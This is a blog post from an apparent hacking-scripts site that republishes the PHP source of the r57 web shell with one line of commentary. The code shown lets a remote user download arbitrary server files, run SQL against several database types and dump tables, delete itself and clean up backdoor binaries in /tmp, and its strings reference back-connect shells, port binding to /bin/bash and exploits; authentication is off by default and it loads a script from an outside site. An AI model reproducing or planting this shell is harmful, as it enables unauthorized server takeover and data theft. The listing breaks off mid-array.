HackingScripts

Hack Scripts for everybody

r57 Shell (encrypted)

10 Feb 2014

I’m pretty sure the r57 and c99 shells are more or less the same, but this r57 shell does look quite different to the usual c99 script.

r57 Shell Source Code

   1 <?php
   2 /******************************************************************************************************/
   3 /*                                         WW.R57.GEN.TR
   4 /*                                     #    #        #    #
   5 /*                                     #   #          #   #
   6 /*                                    #    #          #    #
   7 /*                                    #   
   8 ###   
   9 ###
  10 ###   
  11 ###   #
  12 /*                                   
  13 ###   
  14 ###  
  15 ###
  16 ###
  17 ###  
  18 ###   
  19 ###
  20 /*                                   
  21 ###   
  22 ###  
  23 ###
  24 ###
  25 ###  
  26 ###   
  27 ###
  28 /*                                   
  29 ###   
  30 ###   
  31 ###
  32 ###   
  33 ###   
  34 ###g
  35 /*                                   
  36 ####   
  37 ###
  38 ###
  39 ###
  40 ###
  41 ###
  42 ###   
  43 ####
  44 /*                                   
  45 ###
  46 ###
  47 ###
  48 ###
  49 ###
  50 ###
  51 ###
  52 ###
  53 ###
  54 ###
  55 ###
  56 ###
  57 /*                                 
  58 ###
  59 ###
  60 ###
  61 ### 
  62 ###
  63 ###
  64 ###
  65 ###
  66 ### 
  67 ###
  68 ###
  69 ####
  70 /*                                
  71 ####   
  72 ###  
  73 ###
  74 ###
  75 ###
  76 ###
  77 ###  
  78 ###   
  79 ####
  80 /*                                
  81 ####   
  82 ###  
  83 ###
  84 ###
  85 ###
  86 ###
  87 ###  
  88 ###   
  89 ####
  90 /*                                 
  91 ####   #  
  92 ###
  93 ###
  94 ###
  95 ###
  96 ###  #   
  97 ####
  98 /*                                 
  99 ####   
 100 ###  
 101 ###
 102 ###
 103 ###
 104 ###  
 105 ###   
 106 ####
 107 /*                                  
 108 ###    #   
 109 ###
 110 ###
 111 ###   #    
 112 ###
 113 /*                                   
 114 ###   #    
 115 ###
 116 ###   #    
 117 ###
 118 /*                                     
 119 ###                 
 120 ###
 121 /*                                WWW.R57.GEN.TR Hacking Shell Security
 122 /*
 123 /*
 124 /*  r57shell // r57.gen.tr
 125 /* ~~~ ????????? | Options  ~~~ */
 126 // ????? ????? | Language
 127 // $language='tur' - turkish (Turkce)
 128 $language='tur';
 129 // ?????????????? | Authentification
 130 // $auth = 1; - ?????????????? ????????  ( authentification = On  )
 131 // $auth = 0; - ?????????????? ????????? ( authentification = Off )
 132 $auth = 0;
 133 
 134 // ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)
 135 // ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)
 136 // ????? ? ?????? ????????? ? ??????? ????????? md5, ???????? ?? ????????? 'r57'
 137 // Login & password crypted with md5, default is 'r57'
 138 $name='r57'; // ????? ????????????  (user login)
 139 $pass='r57'; // ?????? ???????????? (user password)
 140 /******************************************************************************************************/
 141 error_reporting(0);
 142 set_magic_quotes_runtime(0);
 143 @set_time_limit(0);
 144 @ini_set('max_execution_time',0);
 145 @ini_set('output_buffering',0);
 146 $safe_mode = @ini_get('safe_mode');
 147 $version = "1.0";
 148 if(version_compare(phpversion(), '4.1.0') == -1)
 149  {
 150  $_POST   = &$HTTP_POST_VARS;
 151  $_GET    = &$HTTP_GET_VARS;
 152  $_SERVER = &$HTTP_SERVER_VARS;
 153  }
 154 if (@get_magic_quotes_gpc())
 155  {
 156  foreach ($_POST as $k=>$v)
 157   {
 158   $_POST[$k] = stripslashes($v);
 159   }
 160  foreach ($_SERVER as $k=>$v)
 161   {
 162   $_SERVER[$k] = stripslashes($v);
 163   }
 164  }
 165 
 166 if($auth == 1) {
 167 if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
 168    {
 169    header('WWW-Authenticate: Basic realm="r57shell"');
 170    header('HTTP/1.0 401 Unauthorized');
 171    exit("<b><a href=http://www.metalteam.org>metalteam.orgs</a> : Izin Verilmedi</b>");
 172    }
 173 }
 174 $head = '<!-- ??????????  ???? -->
 175 <html>
 176 <head>
 177 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
 178 <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
 179 
 180 <STYLE>
 181 tr {
 182 BORDER-RIGHT:  #aaaaaa 1px solid;
 183 BORDER-TOP:    #E8481C 1px solid;
 184 BORDER-LEFT:   #E8481C 1px solid;
 185 BORDER-BOTTOM: #aaaaaa 1px solid;
 186 }
 187 td {
 188 BORDER-RIGHT:  #aaaaaa 1px solid;
 189 BORDER-TOP:    #E8481C 1px solid;
 190 BORDER-LEFT:   #E8481C 1px solid;
 191 BORDER-BOTTOM: #aaaaaa 1px solid;
 192 }
 193 .table1 {
 194 BORDER-RIGHT:  #396D95 0px;
 195 BORDER-TOP:    #396D95 0px;
 196 BORDER-LEFT:   #396D95 0px;
 197 BORDER-BOTTOM: #396D95 0px;
 198 BACKGROUND-COLOR: #396D95
 199 }
 200 .td1 {
 201 BORDER-RIGHT:  #396D95 0px;
 202 BORDER-TOP:    #396D95 0px;
 203 BORDER-LEFT:   #396D95 0px;
 204 BORDER-BOTTOM: #396D95 0px;
 205 font: 7pt Verdana;
 206 }
 207 .tr1 {
 208 BORDER-RIGHT:  #396D95 0px;
 209 BORDER-TOP:    #396D95 0px;
 210 BORDER-LEFT:   #396D95 0px;
 211 BORDER-BOTTOM: #396D95 0px;
 212 }
 213 table {
 214 BORDER-RIGHT:  #E8481C 1px outset;
 215 BORDER-TOP:    #E8481C 1px outset;
 216 BORDER-LEFT:   #E8481C 1px outset;
 217 BORDER-BOTTOM: #E8481C 1px outset;
 218 BACKGROUND-COLOR: #396D95;
 219 }
 220 input {
 221 BORDER-RIGHT:  #000000 1px solid;
 222 BORDER-TOP:    #FC602B 1px solid;
 223 BORDER-LEFT:   #FC602B 1px solid;
 224 BORDER-BOTTOM: #000000 1px solid;
 225 BACKGROUND-COLOR: #396D95;
 226 font: 8pt Verdana;
 227 }
 228 select {
 229 BORDER-RIGHT:  #000000 1px solid;
 230 BORDER-TOP:    #D55022 1px solid;
 231 BORDER-LEFT:   #D55022 1px solid;
 232 BORDER-BOTTOM: #000000 1px solid;
 233 BACKGROUND-COLOR: #396D95;
 234 font: 8pt Verdana;
 235 }
 236 submit {
 237 BORDER-RIGHT:  buttonhighlight 2px outset;
 238 BORDER-TOP:    buttonhighlight 2px outset;
 239 BORDER-LEFT:   buttonhighlight 2px outset;
 240 BORDER-BOTTOM: buttonhighlight 2px outset;
 241 BACKGROUND-COLOR: #396D95;
 242 width: 30%;
 243 }
 244 textarea {
 245 BORDER-RIGHT:  #000000 1px solid;
 246 BORDER-TOP:    #D55022 1px solid;
 247 BORDER-LEFT:   #D55022 1px solid;
 248 BORDER-BOTTOM: #000000 1px solid;
 249 BACKGROUND-COLOR: #396D95;
 250 font: Fixedsys bold;
 251 }
 252 BODY {
 253 margin-top: 1px;
 254 margin-right: 1px;
 255 margin-bottom: 1px;
 256 margin-left: 1px;
 257 }
 258 A:link {COLOR:orange; TEXT-DECORATION: none}
 259 A:visited { COLOR:orange; TEXT-DECORATION: none}
 260 A:active {COLOR:orange; TEXT-DECORATION: none}
 261 A:hover {color:#BF0F0F;TEXT-DECORATION: none}
 262 </STYLE>';
 263 class zipfile
 264 {
 265     var $datasec      = array();
 266     var $ctrl_dir     = array();
 267     var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
 268     var $old_offset   = 0;
 269     function unix2DosTime($unixtime = 0) {
 270         $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
 271         if ($timearray['year'] < 1980) {
 272             $timearray['year']    = 1980;
 273             $timearray['mon']     = 1;
 274             $timearray['mday']    = 1;
 275             $timearray['hours']   = 0;
 276             $timearray['minutes'] = 0;
 277             $timearray['seconds'] = 0;
 278         }
 279         return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
 280                 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
 281     }
 282     function addFile($data, $name, $time = 0)
 283     {
 284         $name     = str_replace('\\', '/', $name);
 285         $dtime    = dechex($this->unix2DosTime($time));
 286         $hexdtime = '\x' . $dtime[6] . $dtime[7]
 287                   . '\x' . $dtime[4] . $dtime[5]
 288                   . '\x' . $dtime[2] . $dtime[3]
 289                   . '\x' . $dtime[0] . $dtime[1];
 290         eval('$hexdtime = "' . $hexdtime . '";');
 291         $fr   = "\x50\x4b\x03\x04";
 292         $fr   .= "\x14\x00";
 293         $fr   .= "\x00\x00";
 294         $fr   .= "\x08\x00";
 295         $fr   .= $hexdtime;
 296         $unc_len = strlen($data);
 297         $crc     = crc32($data);
 298         $zdata   = gzcompress($data);
 299         $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
 300         $c_len   = strlen($zdata);
 301         $fr      .= pack('V', $crc);
 302         $fr      .= pack('V', $c_len);
 303         $fr      .= pack('V', $unc_len);
 304         $fr      .= pack('v', strlen($name));
 305         $fr      .= pack('v', 0);
 306         $fr      .= $name;
 307         $fr .= $zdata;
 308         $this -> datasec[] = $fr;
 309         $cdrec = "\x50\x4b\x01\x02";
 310         $cdrec .= "\x00\x00";
 311         $cdrec .= "\x14\x00";
 312         $cdrec .= "\x00\x00";
 313         $cdrec .= "\x08\x00";
 314         $cdrec .= $hexdtime;
 315         $cdrec .= pack('V', $crc);
 316         $cdrec .= pack('V', $c_len);
 317         $cdrec .= pack('V', $unc_len);
 318         $cdrec .= pack('v', strlen($name) );
 319         $cdrec .= pack('v', 0 );
 320         $cdrec .= pack('v', 0 );
 321         $cdrec .= pack('v', 0 );
 322         $cdrec .= pack('v', 0 );
 323         $cdrec .= pack('V', 32 );
 324         $cdrec .= pack('V', $this -> old_offset );
 325         $this -> old_offset += strlen($fr);
 326         $cdrec .= $name;
 327         $this -> ctrl_dir[] = $cdrec;
 328     }
 329     function file()
 330     {
 331         $data    = implode('', $this -> datasec);
 332         $ctrldir = implode('', $this -> ctrl_dir);
 333         return
 334             $data .
 335             $ctrldir .
 336             $this -> eof_ctrl_dir .
 337             pack('v', sizeof($this -> ctrl_dir)) .
 338             pack('v', sizeof($this -> ctrl_dir)) .
 339             pack('V', strlen($ctrldir)) .
 340             pack('V', strlen($data)) .
 341             "\x00\x00";
 342     }
 343 }
 344 function compress(&$filename,&$filedump,$compress)
 345  {
 346     global $content_encoding;
 347     global $mime_type;
 348     if ($compress == 'bzip' && @function_exists('bzcompress'))
 349      {
 350         $filename  .= '.bz2';
 351         $mime_type = 'application/x-bzip2';
 352         $filedump = bzcompress($filedump);
 353      }
 354      else if ($compress == 'gzip' && @function_exists('gzencode'))
 355      {
 356         $filename  .= '.gz';
 357         $content_encoding = 'x-gzip';
 358         $mime_type = 'application/x-gzip';
 359         $filedump = gzencode($filedump);
 360      }
 361      else if ($compress == 'zip' && @function_exists('gzcompress'))
 362      {
 363        $filename .= '.zip';
 364         $mime_type = 'application/zip';
 365         $zipfile = new zipfile();
 366         $zipfile -> addFile($filedump, substr($filename, 0, -4));
 367         $filedump = $zipfile -> file();
 368      }
 369      else
 370      {
 371        $mime_type = 'application/octet-stream';
 372      }
 373  }
 374 function mailattach($to,$from,$subj,$attach)
 375  {
 376  $headers  = "From: $from\r\n";
 377  $headers .= "MIME-Version: 1.0\r\n";
 378  $headers .= "Content-Type: ".$attach['type'];
 379  $headers .= "; name=\"".$attach['name']."\"\r\n";
 380  $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
 381  $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
 382  if(@mail($to,$subj,"",$headers)) { return 1; }
 383  return 0;
 384  }
 385 class my_sql
 386  {
 387  var $host = 'localhost';
 388  var $port = '';
 389  var $user = '';
 390  var $pass = '';
 391  var $base = '';
 392  var $db   = '';
 393  var $connection;
 394  var $res;
 395  var $error;
 396  var $rows;
 397  var $columns;
 398  var $num_rows;
 399  var $num_fields;
 400  var $dump;
 401 
 402  function connect()
 403   {
 404    switch($this->db)
 405      {
 406     case 'MySQL':
 407      if(empty($this->port)) { $this->port = '3306'; }
 408      if(!function_exists('mysql_connect')) return 0;
 409      $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
 410      if(is_resource($this->connection)) return 1;
 411     break;
 412      case 'MSSQL':
 413       if(empty($this->port)) { $this->port = '1433'; }
 414      if(!function_exists('mssql_connect')) return 0;
 415      $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
 416       if($this->connection) return 1;
 417      break;
 418      case 'PostgreSQL':
 419       if(empty($this->port)) { $this->port = '5432'; }
 420       $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
 421       if(!function_exists('pg_connect')) return 0;
 422       $this->connection = @pg_connect($str);
 423       if(is_resource($this->connection)) return 1;
 424      break;
 425      case 'Oracle':
 426       if(!function_exists('ocilogon')) return 0;
 427       $this->connection = @ocilogon($this->user, $this->pass, $this->base);
 428       if(is_resource($this->connection)) return 1;
 429      break;
 430      }
 431     return 0;
 432   }
 433 
 434  function select_db()
 435   {
 436    switch($this->db)
 437     {
 438    case 'MySQL':
 439     if(@mysql_select_db($this->base,$this->connection)) return 1;
 440     break;
 441     case 'MSSQL':
 442     if(@mssql_select_db($this->base,$this->connection)) return 1;
 443     break;
 444     case 'PostgreSQL':
 445      return 1;
 446     break;
 447     case 'Oracle':
 448      return 1;
 449     break;
 450     }
 451    return 0;
 452   }
 453 
 454  function query($query)
 455   {
 456    $this->res=$this->error='';
 457    switch($this->db)
 458     {
 459    case 'MySQL':
 460      if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
 461       {
 462       $this->error = @mysql_error($this->connection);
 463       return 0;
 464       }
 465      else if(is_resource($this->res)) { return 1; }
 466      return 2;
 467    break;
 468     case 'MSSQL':
 469      if(false===($this->res=@mssql_query($query,$this->connection)))
 470       {
 471       $this->error = 'Query error';
 472       return 0;
 473       }
 474       else if(@mssql_num_rows($this->res) > 0) { return 1; }
 475      return 2;
 476     break;
 477     case 'PostgreSQL':
 478      if(false===($this->res=@pg_query($this->connection,$query)))
 479       {
 480       $this->error = @pg_last_error($this->connection);
 481       return 0;
 482       }
 483       else if(@pg_num_rows($this->res) > 0) { return 1; }
 484      return 2;
 485     break;
 486     case 'Oracle':
 487      if(false===($this->res=@ociparse($this->connection,$query)))
 488       {
 489       $this->error = 'Query parse error';
 490       }
 491      else
 492       {
 493       if(@ociexecute($this->res))
 494        {
 495        if(@ocirowcount($this->res) != 0) return 2;
 496        return 1;
 497        }
 498       $error = @ocierror();
 499       $this->error=$error['message'];
 500       }
 501     break;
 502     }
 503   return 0;
 504   }
 505  function get_result()
 506   {
 507    $this->rows=array();
 508    $this->columns=array();
 509    $this->num_rows=$this->num_fields=0;
 510    switch($this->db)
 511     {
 512    case 'MySQL':
 513     $this->num_rows=@mysql_num_rows($this->res);
 514     $this->num_fields=@mysql_num_fields($this->res);
 515     while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
 516     @mysql_free_result($this->res);
 517     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 518     break;
 519     case 'MSSQL':
 520     $this->num_rows=@mssql_num_rows($this->res);
 521     $this->num_fields=@mssql_num_fields($this->res);
 522     while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
 523     @mssql_free_result($this->res);
 524     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
 525     break;
 526     case 'PostgreSQL':
 527     $this->num_rows=@pg_num_rows($this->res);
 528     $this->num_fields=@pg_num_fields($this->res);
 529     while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
 530     @pg_free_result($this->res);
 531     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 532     break;
 533     case 'Oracle':
 534      $this->num_fields=@ocinumcols($this->res);
 535      while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
 536      @ocifreestatement($this->res);
 537      if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 538     break;
 539     }
 540    return 0;
 541   }
 542  function dump($table)
 543   {
 544    if(empty($table)) return 0;
 545    $this->dump=array();
 546    $this->dump[0] = '
 547 ###';
 548    $this->dump[1] = '
 549 ### --------------------------------------- ';
 550    $this->dump[2] = '
 551 ###  Created: '.date ("d/m/Y H:i:s");
 552    $this->dump[3] = '
 553 ### Database: '.$this->base;
 554    $this->dump[4] = '
 555 ###    Table: '.$table;
 556    $this->dump[5] = '
 557 ### --------------------------------------- ';
 558    switch($this->db)
 559     {
 560    case 'MySQL':
 561     $this->dump[0] = '
 562 ### MySQL dump';
 563     if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
 564     if(!$this->get_result()) return 0;
 565     $this->dump[] = $this->rows[0]['Create Table'];
 566      $this->dump[] = '
 567 ### --------------------------------------- ';
 568     if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
 569     if(!$this->get_result()) return 0;
 570     for($i=0;$i<$this->num_rows;$i++)
 571      {
 572       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
 573      $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 574      }
 575     break;
 576     case 'MSSQL':
 577      $this->dump[0] = '
 578 ### MSSQL dump';
 579      if($this->query('SELECT * FROM '.$table)!=1) return 0;
 580     if(!$this->get_result()) return 0;
 581     for($i=0;$i<$this->num_rows;$i++)
 582      {
 583       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
 584      $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 585      }
 586     break;
 587     case 'PostgreSQL':
 588      $this->dump[0] = '
 589 ### PostgreSQL dump';
 590      if($this->query('SELECT * FROM '.$table)!=1) return 0;
 591     if(!$this->get_result()) return 0;
 592     for($i=0;$i<$this->num_rows;$i++)
 593      {
 594       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
 595      $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 596      }
 597     break;
 598     case 'Oracle':
 599       $this->dump[0] = '
 600 ### ORACLE dump';
 601       $this->dump[]  = '
 602 ### under construction';
 603     break;
 604     default:
 605      return 0;
 606     break;
 607     }
 608    return 1;
 609   }
 610  function close()
 611   {
 612    switch($this->db)
 613     {
 614    case 'MySQL':
 615     @mysql_close($this->connection);
 616     break;
 617     case 'MSSQL':
 618      @mssql_close($this->connection);
 619     break;
 620     case 'PostgreSQL':
 621      @pg_close($this->connection);
 622     break;
 623     case 'Oracle':
 624      @oci_close($this->connection);
 625     break;
 626     }
 627   }
 628  function affected_rows()
 629   {
 630    switch($this->db)
 631     {
 632    case 'MySQL':
 633     return @mysql_affected_rows($this->res);
 634     break;
 635     case 'MSSQL':
 636      return @mssql_affected_rows($this->res);
 637     break;
 638     case 'PostgreSQL':
 639      return @pg_affected_rows($this->res);
 640     break;
 641     case 'Oracle':
 642      return @ocirowcount($this->res);
 643     break;
 644     default:
 645      return 0;
 646     break;
 647     }
 648   }
 649  }
 650 if(isset($_GET['img'])&&!empty($_GET['img']))
 651  {
 652  $images = array();
 653  $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw==';
 654  $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw==';
 655  @ob_clean();
 656  header("Content-type: image/gif");
 657  echo base64_decode($images[$_GET['img']]);
 658  die();
 659  }
 660 if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
 661  {
 662   if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; }
 663   else
 664    {
 665     @ob_clean();
 666     $filename = @basename($_POST['d_name']);
 667     $filedump = @fread($file,@filesize($_POST['d_name']));
 668     fclose($file);
 669     $content_encoding=$mime_type='';
 670     compress($filename,$filedump,$_POST['compress']);
 671     if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
 672     header("Content-type: ".$mime_type);
 673     header("Content-disposition: attachment; filename=\"".$filename."\";");
 674     echo $filedump;
 675     exit();
 676    }
 677  }
 678 if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">Geri</a> ]</b></font></div>"; die(); }
 679 if ($_POST['cmd']=="db_query")
 680  {
 681  echo $head;
 682  $sql = new my_sql();
 683  $sql->db   = $_POST['db'];
 684  $sql->host = $_POST['db_server'];
 685  $sql->port = $_POST['db_port'];
 686  $sql->user = $_POST['mysql_l'];
 687  $sql->pass = $_POST['mysql_p'];
 688  $sql->base = $_POST['mysql_db'];
 689  $querys = @explode(';',$_POST['db_query']);
 690 
 691  if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=orange><b>Sql Server ile Baglant? Kurulamad? </b></font></div>";
 692   else
 693    {
 694    if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=orange><b>DataBase Girilmedi</b></font></div>";
 695    else
 696     {
 697     foreach($querys as $num=>$query)
 698      {
 699       if(strlen($query)>5)
 700       {
 701       echo "<font face=Verdana size=-2 color=white><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
 702       switch($sql->query($query))
 703        {
 704        case '0':
 705        echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
 706        break;
 707        case '1':
 708        if($sql->get_result())
 709         {
 710            echo "<table width=100%>";
 711         foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
 712            $keys = @implode("&nbsp;</b></font></td><td bgcolor=#396D95><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
 713         echo "<tr><td bgcolor=#396D95><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
 714         for($i=0;$i<$sql->num_rows;$i++)
 715          {
 716          foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
 717          $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
 718          echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
 719          }
 720         echo "</table>";
 721         }
 722        break;
 723        case '2':
 724        $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
 725        echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
 726        break;
 727        }
 728       }
 729      }
 730     }
 731    }
 732  echo "<br><form name=form method=POST>";
 733  echo in('hidden','db',0,$_POST['db']);
 734  echo in('hidden','db_server',0,$_POST['db_server']);
 735  echo in('hidden','db_port',0,$_POST['db_port']);
 736  echo in('hidden','mysql_l',0,$_POST['mysql_l']);
 737  echo in('hidden','mysql_p',0,$_POST['mysql_p']);
 738  echo in('hidden','mysql_db',0,$_POST['mysql_db']);
 739  echo in('hidden','cmd',0,'db_query');
 740  echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
 741  echo "</form>";
 742  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
 743  }
 744 if(isset($_GET['delete']))
 745  {
 746    @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
 747  }
 748 if(isset($_GET['tmp']))
 749  {
 750    @unlink("/tmp/bdpl");
 751    @unlink("/tmp/back");
 752    @unlink("/tmp/bd");
 753    @unlink("/tmp/bd.c");
 754    @unlink("/tmp/dp");
 755    @unlink("/tmp/dpc");
 756    @unlink("/tmp/dpc.c");
 757  }
 758 if(isset($_GET['phpini']))
 759 {
 760 echo $head;
 761 function U_value($value)
 762  {
 763  if ($value == '') return '<i>no value</i>';
 764  if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
 765  if ($value === null) return 'NULL';
 766  if (@is_object($value)) $value = (array) $value;
 767  if (@is_array($value))
 768  {
 769  @ob_start();
 770  print_r($value);
 771  $value = @ob_get_contents();
 772  @ob_end_clean();
 773  }
 774  return U_wordwrap((string) $value);
 775  }
 776 function U_wordwrap($str)
 777  {
 778  $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
 779  return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
 780  }
 781 if (@function_exists('ini_get_all'))
 782  {
 783  $r = '';
 784  echo '<table width=100%>', '<tr><td bgcolor=#396D95><font face=Verdana size=-2 color=orange><div align=center><b>Directive</b></div></font></td><td bgcolor=#396D95><font face=Verdana size=-2 color=orange><div align=center><b>Local Value</b></div></font></td><td bgcolor=#396D95><font face=Verdana size=-2 color=orange><div align=center><b>Master Value</b></div></font></td></tr>';
 785  foreach (@ini_get_all() as $key=>$value)
 786   {
 787   $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
 788   }
 789  echo $r;
 790  echo '</table>';
 791  }
 792 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
 793 die();
 794 }
 795 if(isset($_GET['cpu']))
 796  {
 797    echo $head;
 798    echo '<table width=100%><tr><td bgcolor=#396D95><div align=center><font face=Verdana size=-2 color=orange><b>CPU</b></font></div></td></tr></table><table width=100%>';
 799    $cpuf = @file("cpuinfo");
 800    if($cpuf)
 801     {
 802       $c = @sizeof($cpuf);
 803       for($i=0;$i<$c;$i++)
 804         {
 805           $info = @explode(":",$cpuf[$i]);
 806           if($info[1]==""){ $info[1]="---"; }
 807           $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
 808         }
 809       echo $r;
 810     }
 811    else
 812     {
 813       echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
 814     }
 815    echo '</table>';
 816    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
 817    die();
 818  }
 819 if(isset($_GET['mem']))
 820  {
 821    echo $head;
 822    echo '<table width=100%><tr><td bgcolor=#396D95><div align=center><font face=Verdana size=-2 color=orange><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
 823    $memf = @file("meminfo");
 824    if($memf)
 825     {
 826       $c = sizeof($memf);
 827       for($i=0;$i<$c;$i++)
 828         {
 829           $info = explode(":",$memf[$i]);
 830           if($info[1]==""){ $info[1]="---"; }
 831           $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
 832         }
 833       echo $r;
 834     }
 835    else
 836     {
 837       echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
 838     }
 839    echo '</table>';
 840    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
 841    die();
 842  }
 843 $lang=array(
 844 'ru_text1' =>'??????????? ???????',
 845 'ru_text2' =>'?????????? ?????? ?? ???????',
 846 'ru_text3' =>'????????? ???????',
 847 'ru_text4' =>'??????? ??????????',
 848 'ru_text5' =>'???????? ?????? ?? ??????',
 849 'ru_text6' =>'????????? ????',
 850 'ru_text7' =>'??????',
 851 'ru_text8' =>'???????? ?????',
 852 'ru_butt1' =>'?????????',
 853 'ru_butt2' =>'?????????',
 854 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
 855 'ru_text10'=>'??????? ????',
 856 'ru_text11'=>'?????? ??? ???????',
 857 'ru_butt3' =>'???????',
 858 'ru_text12'=>'back-connect',
 859 'ru_text13'=>'IP-?????',
 860 'ru_text14'=>'????',
 861 'ru_butt4' =>'?????????',
 862 'ru_text15'=>'???????? ?????? ? ?????????? ???????',
 863 'ru_text16'=>'????????????',
 864 'ru_text17'=>'????????? ????',
 865 'ru_text18'=>'????????? ????',
 866 'ru_text19'=>'Exploits',
 867 'ru_text20'=>'????????????',
 868 'ru_text21'=>'????? ???',
 869 'ru_text22'=>'datapipe',
 870 'ru_text23'=>'????????? ????',
 871 'ru_text24'=>'????????? ????',
 872 'ru_text25'=>'????????? ????',
 873 'ru_text26'=>'????????????',
 874 'ru_butt5' =>'?????????',
 875 'ru_text28'=>'?????? ? safe_mode',
 876 'ru_text29'=>'?????? ????????',
 877 'ru_butt6' =>'???????',
 878 'ru_text30'=>'???????? ?????',
 879 'ru_butt7' =>'???????',
 880 'ru_text31'=>'???? ?? ??????',
